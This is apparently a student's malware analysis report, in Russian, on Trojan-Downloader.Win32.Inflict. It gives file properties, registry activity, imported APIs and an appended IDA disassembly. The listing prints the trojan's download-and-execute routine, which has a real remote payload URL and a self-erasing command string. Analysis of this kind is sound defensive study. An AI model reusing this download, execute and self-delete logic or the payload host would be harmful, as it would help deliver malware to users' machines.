Исследование вируса Trojan-Downloader.Win32.Inflict Студент гр. 4130 Базанов С.Л.
Название
Trojan-Downloader.Win32.Inflict
Тип исполняемого файла
Portableexecutablefor 80386 (PE)
Предполагаемый язык программирования
Borland-Delphi v 6.0 – 7.0
Секции
.text, .rdata, .data, .rsrc, .idata
Точка входа
00001000
Упаковщик / протектор
Ничем не упакован
Размер запакованного / размер распакованного
Ничем не упакован / 3584 байт
Какие файлы модифицируются
C:\WINDOWS\Prefetch\TROJAN-DOWNLOADER.WIN32.INFLI-2837B369.pf
C:\WINDOWS\Prefetch\TROJAN-DOWNLOADER.WIN32.INFLI-2837B369.pf
Какие ключи реестра модифицирует и как
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common AppData
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8455b302-9ae3-11e1-8b02-806d6172696f}\BaseClass
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8455b300-9ae3-11e1-8b02-806d6172696f}\BaseClass SUCCESS Type: REG_SZ, Length: 12, Data: Drive
Другая вредоносная активность (описание)
Троянская программа, загружающая из интернета файлы без ведома пользователя.
После запуска троянец ждёт подключения зараженного компьютера к интернету, после чего пытается загрузить файл и сохранить его.
После этого загруженный файл запускается на исполнение.
Тип\ вредоносного ПО
Trojan downloader
Листинг
В приложение 1.
Какие бибилотеки исполользует / api функции
C:\WINDOWS\system32\kernel32.dll C:\WINDOWS\system32\shell32.dll C:\WINDOWS\system32\urlmon.dll Функции:
ShellExecuteA shell32.dll URLDownloadToFileA urlmon.dll GetModuleFileNameA kernel32.dll
GetShortPathNameA kernel32.dll
lstrcatA kernel32.dll
ExitProcess kernel32.dll
Используемый инструментарий
Virtualbox, IDA, PeId v 0,95, RDG Packer Detector v 0.6.8, Process Monitor
Приложение 1
.text:00401000 ; File Name : C:\Documents and Settings\admin\¦юш фюъєьхэЄv\¦руЁєчъш\Trojan-Downloader.Win32.Inflict\Trojan-Downloader.Win32.Inflict.exe .text:00401000 ; Format : Portable executable for 80386 (PE) .text:00401000 ; Imagebase : 400000 .text:00401000 ; Section 1. (virtual address 00001000) .text:00401000 ; Virtual size : 00000088 ( 136.) .text:00401000 ; Section size in file : 00000200 ( 512.) .text:00401000 ; Offset to raw data for section: 00000400 .text:00401000 ; Flags 60000020: Text Executable Readable .text:00401000 ; Alignment : default .text:00401000 ; =========================================================================== .text:00401000 .text:00401000 ; Segment type: Pure code .text:00401000 ; Segment permissions: Read/Execute .text:00401000 _text segment para public 'CODE' use32 .text:00401000 assume cs:_text .text:00401000 ;org 401000h .text:00401000 assume es:debug008, ss:debug008, ds:_data, fs:nothing, gs:nothing .text:00401000 .text:00401000 ; =============== S U B R O U T I N E ======================================= .text:00401000 .text:00401000 .text:00401000 public start .text:00401000 start proc near .text:00401000 push 0 ; LPBINDSTATUSCALLBACK .text:00401002 push 0 ; DWORD .text:00401004 push offset File ; "C:\\windows\\sys32sspcr.com" .text:00401009 push offset aHttpIce_prohos ; "http://ice.prohosting.com/freebonb/sys3"... .text:0040100E push 0 ; LPUNKNOWN .text:00401010 call URLDownloadToFileA .text:00401015 push 5 ; nShowCmd .text:00401017 push 0 ; lpDirectory .text:00401019 push 0 ; lpParameters .text:0040101B push offset File ; "C:\\windows\\sys32sspcr.com" .text:00401020 push 0 ; lpOperation .text:00401022 push 0 ; hwnd .text:00401024 call ShellExecuteA .text:00401029 push 100h ; nSize .text:0040102E push offset String2 ; lpFilename .text:00401033 push 0 ; hModule .text:00401035 call GetModuleFileNameA .text:0040103A push 103h ; cchBuffer .text:0040103F push offset String2 ; lpszShortPath .text:00401044 push offset String2 ; lpszLongPath .text:00401049 call GetShortPathNameA .text:0040104E push offset String2 ; lpString2 .text:00401053 push offset String1 ; "C:\\Command.com /C Choice.com /C:YN /N /"... .text:00401058 call lstrcatA .text:0040105D push 0 .text:0040105F call $+5 .text:00401064 jmp ds:ExitProcess .text:00401064 start endp .text:00401064 .text:0040106A .text:0040106A ; =============== S U B R O U T I N E ======================================= .text:0040106A .text:0040106A ; Attributes: thunk .text:0040106A .text:0040106A ; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPSTR lpFilename, DWORD nSize) .text:0040106A GetModuleFileNameA proc near ; CODE XREF: start+35 p .text:0040106A jmp ds:__imp_GetModuleFileNameA .text:0040106A GetModuleFileNameA endp .text:0040106A .text:00401070 .text:00401070 ; =============== S U B R O U T I N E ======================================= .text:00401070 .text:00401070 ; Attributes: thunk .text:00401070 .text:00401070 ; DWORD __stdcall GetShortPathNameA(LPCSTR lpszLongPath, LPSTR lpszShortPath, DWORD cchBuffer) .text:00401070 GetShortPathNameA proc near ; CODE XREF: start+49 p .text:00401070 jmp ds:__imp_GetShortPathNameA .text:00401070 GetShortPathNameA endp .text:00401070 .text:00401076 .text:00401076 ; =============== S U B R O U T I N E ======================================= .text:00401076 .text:00401076 ; Attributes: thunk .text:00401076 .text:00401076 ; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2) .text:00401076 lstrcatA proc near ; CODE XREF: start+58 p .text:00401076 jmp ds:__imp_lstrcatA .text:00401076 lstrcatA endp .text:00401076 .text:0040107C .text:0040107C ; =============== S U B R O U T I N E ======================================= .text:0040107C .text:0040107C ; Attributes: thunk .text:0040107C .text:0040107C ; HRESULT __stdcall URLDownloadToFileA(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK) .text:0040107C URLDownloadToFileA proc near ; CODE XREF: start+10 p .text:0040107C jmp ds:__imp_URLDownloadToFileA .text:0040107C URLDownloadToFileA endp .text:0040107C .text:00401082 .text:00401082 ; =============== S U B R O U T I N E ======================================= .text:00401082 .text:00401082 ; Attributes: thunk .text:00401082 .text:00401082 ; HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd) .text:00401082 ShellExecuteA proc near ; CODE XREF: start+24 p .text:00401082 jmp ds:__imp_ShellExecuteA .text:00401082 ShellExecuteA endp .text:00401082 .text:00401082 ; --------------------------------------------------------------------------- .text:00401088 dd 5Eh dup(0) .text:00401200 dd 380h dup(0) .text:00401200 _text ends .text:00401200 .idata:00402000 ; Section 2. (virtual address 00002000) .idata:00402000 ; Virtual size : 00000174 ( 372.) .idata:00402000 ; Section size in file : 00000200 ( 512.) .idata:00402000 ; Offset to raw data for section: 00000600 .idata:00402000 ; Flags 40000040: Data Readable .idata:00402000 ; Alignment : default .idata:00402000 ; .idata:00402000 ; Imports from KERNEL32.dll .idata:00402000 ; .idata:00402000 ; =========================================================================== .idata:00402000 .idata:00402000 ; Segment type: Externs .idata:00402000 ; _idata .idata:00402000 ; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPSTR lpFilename, DWORD nSize) .idata:00402000 __imp_GetModuleFileNameA dd offset kernel32_GetModuleFileNameA .idata:00402000 ; DATA XREF: GetModuleFileNameA r .idata:00402000 ; .rdata:00402080 o .idata:00402004 ; DWORD __stdcall GetShortPathNameA(LPCSTR lpszLongPath, LPSTR lpszShortPath, DWORD cchBuffer) .idata:00402004 __imp_GetShortPathNameA dd offset kernel32_GetShortPathNameA .idata:00402004 ; DATA XREF: GetShortPathNameA r .idata:00402008 ; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2) .idata:00402008 __imp_lstrcatA dd offset kernel32_lstrcat ; DATA XREF: lstrcatA r .idata:0040200C ; void __stdcall ExitProcess(UINT uExitCode) .idata:0040200C ExitProcess dd offset kernel32_ExitProcess ; DATA XREF: start+64 r .idata:00402010 db 4 dup(0) .idata:00402014 ; .idata:00402014 ; Imports from SHELL32.dll .idata:00402014 ; .idata:00402014 ; HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd) .idata:00402014 __imp_ShellExecuteA dd offset shell32_ShellExecuteA .idata:00402014 ; DATA XREF: ShellExecuteA r .idata:00402014 ; .rdata:004020A8 o .idata:00402018 db 4 dup(0) .idata:0040201C ; .idata:0040201C ; Imports from urlmon.dll .idata:0040201C ; .idata:0040201C ; HRESULT __stdcall URLDownloadToFileA(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK) .idata:0040201C __imp_URLDownloadToFileA dd offset urlmon_URLDownloadToFileA .idata:0040201C ; DATA XREF: URLDownloadToFileA r .idata:0040201C ; .rdata:00402094 o .idata:00402020 db 4 dup(0) .idata:00402020 .rdata:00402024 ; =========================================================================== .rdata:00402024 .rdata:00402024 ; Segment type: Pure data .rdata:00402024 ; Segment permissions: Read .rdata:00402024 _rdata segment para public 'DATA' use32 .rdata:00402024 assume cs:_rdata .rdata:00402024 ;org 402024h .rdata:00402024 ; char File[] .rdata:00402024 File db 'C:\windows\sys32sspcr.com',0 ; DATA XREF: start+4 o .rdata:00402024 ; start+1B o .rdata:0040203E ; char aHttpIce_prohos[] .rdata:0040203E aHttpIce_prohos db 'http://ice.prohosting.com/freebonb/sys32sspcr.com',0 .rdata:0040203E ; DATA XREF: start+9 o .rdata:00402070 __IMPORT_DESCRIPTOR_KERNEL32 dd rva off_4020C0 ; Import Name Table .rdata:00402074 dd 0 ; Time stamp .rdata:00402078 dd 0 ; Forwarder Chain .rdata:0040207C dd rva aKernel32_dll ; DLL Name .rdata:00402080 dd rva __imp_GetModuleFileNameA ; Import Address Table .rdata:00402084 __IMPORT_DESCRIPTOR_urlmon dd rva off_4020DC ; Import Name Table .rdata:00402088 dd 0 ; Time stamp .rdata:0040208C dd 0 ; Forwarder Chain .rdata:00402090 dd rva aUrlmon_dll ; DLL Name .rdata:00402094 dd rva __imp_URLDownloadToFileA ; Import Address Table .rdata:00402098 __IMPORT_DESCRIPTOR_SHELL32 dd rva off_4020D4 ; Import Name Table .rdata:0040209C dd 0 ; Time stamp .rdata:004020A0 dd 0 ; Forwarder Chain .rdata:004020A4 dd rva aShell32_dll ; DLL Name .rdata:004020A8 dd rva __imp_ShellExecuteA ; Import Address Table .rdata:004020AC db 0 .rdata:004020AD db 0 .rdata:004020AE db 0 .rdata:004020AF db 0 .rdata:004020B0 db 0 .rdata:004020B1 db 0 .rdata:004020B2 db 0 .rdata:004020B3 db 0 .rdata:004020B4 db 0 .rdata:004020B5 db 0 .rdata:004020B6 db 0 .rdata:004020B7 db 0 .rdata:004020B8 db 0 .rdata:004020B9 db 0 .rdata:004020BA db 0 .rdata:004020BB db 0 .rdata:004020BC db 0 .rdata:004020BD db 0 .rdata:004020BE db 0 .rdata:004020BF db 0 .rdata:004020C0 ; .rdata:004020C0 ; Import names for KERNEL32.dll .rdata:004020C0 ; .rdata:004020C0 off_4020C0 dd rva word_4020F2 ; DATA XREF: .rdata:__IMPORT_DESCRIPTOR_KERNEL32 o .rdata:004020C4 dd rva word_402108 .rdata:004020C8 dd rva word_40211C .rdata:004020CC dd rva word_4020E4 .rdata:004020D0 dd 0 .rdata:004020D4 ; .rdata:004020D4 ; Import names for SHELL32.dll .rdata:004020D4 ; .rdata:004020D4 off_4020D4 dd rva word_402158 ; DATA XREF: .rdata:__IMPORT_DESCRIPTOR_SHELL32 o .rdata:004020D8 dd 0 .rdata:004020DC ; .rdata:004020DC ; Import names for urlmon.dll .rdata:004020DC ; .rdata:004020DC off_4020DC dd rva word_402136 ; DATA XREF: .rdata:__IMPORT_DESCRIPTOR_urlmon o .rdata:004020E0 dd 0 .rdata:004020E4 word_4020E4 dw 75h ; DATA XREF: .rdata:004020CC o .rdata:004020E6 db 'ExitProcess',0 .rdata:004020F2 word_4020F2 dw 10Fh ; DATA XREF: .rdata:off_4020C0 o .rdata:004020F4 db 'GetModuleFileNameA',0 .rdata:00402107 align 4 .rdata:00402108 word_402108 dw 139h ; DATA XREF: .rdata:004020C4 o .rdata:0040210A db 'GetShortPathNameA',0 .rdata:0040211C word_40211C dw 2D3h ; DATA XREF: .rdata:004020C8 o .rdata:0040211E db 'lstrcatA',0 .rdata:00402127 align 4 .rdata:00402128 aKernel32_dll db 'KERNEL32.dll',0 ; DATA XREF: .rdata:0040207C o .rdata:00402135 align 2 .rdata:00402136 word_402136 dw 3Fh ; DATA XREF: .rdata:off_4020DC o .rdata:00402138 db 'URLDownloadToFileA',0 .rdata:0040214B align 4 .rdata:0040214C aUrlmon_dll db 'urlmon.dll',0 ; DATA XREF: .rdata:00402090 o .rdata:00402157 align 4 .rdata:00402158 word_402158 dw 6Eh ; DATA XREF: .rdata:off_4020D4 o .rdata:0040215A db 'ShellExecuteA',0 .rdata:00402168 aShell32_dll db 'SHELL32.dll',0 ; DATA XREF: .rdata:004020A4 o .rdata:00402174 align 1000h .rdata:00402174 _rdata ends .rdata:00402174 .data:00403000 ; Section 3. (virtual address 00003000) .data:00403000 ; Virtual size : 00000138 ( 312.) .data:00403000 ; Section size in file : 00000200 ( 512.) .data:00403000 ; Offset to raw data for section: 00000800 .data:00403000 ; Flags C0000040: Data Readable Writable .data:00403000 ; Alignment : default .data:00403000 ; =========================================================================== .data:00403000 .data:00403000 ; Segment type: Pure data .data:00403000 ; Segment permissions: Read/Write .data:00403000 _data segment para public 'DATA' use32 .data:00403000 assume cs:_data .data:00403000 ;org 403000h .data:00403000 ; char String1[] .data:00403000 String1 db 'C:\Command.com /C Choice.com /C:YN /N /T:Y,10|erase ',0 .data:00403000 ; DATA XREF: start+53 o .data:00403035 align 4 .data:00403038 ; char String2[] .data:00403038 String2 db 1C8h dup(0) ; DATA XREF: start+2E o .data:00403038 ; start+3F o ... .data:00403200 align 1000h .data:00403200 _data ends .data:00403200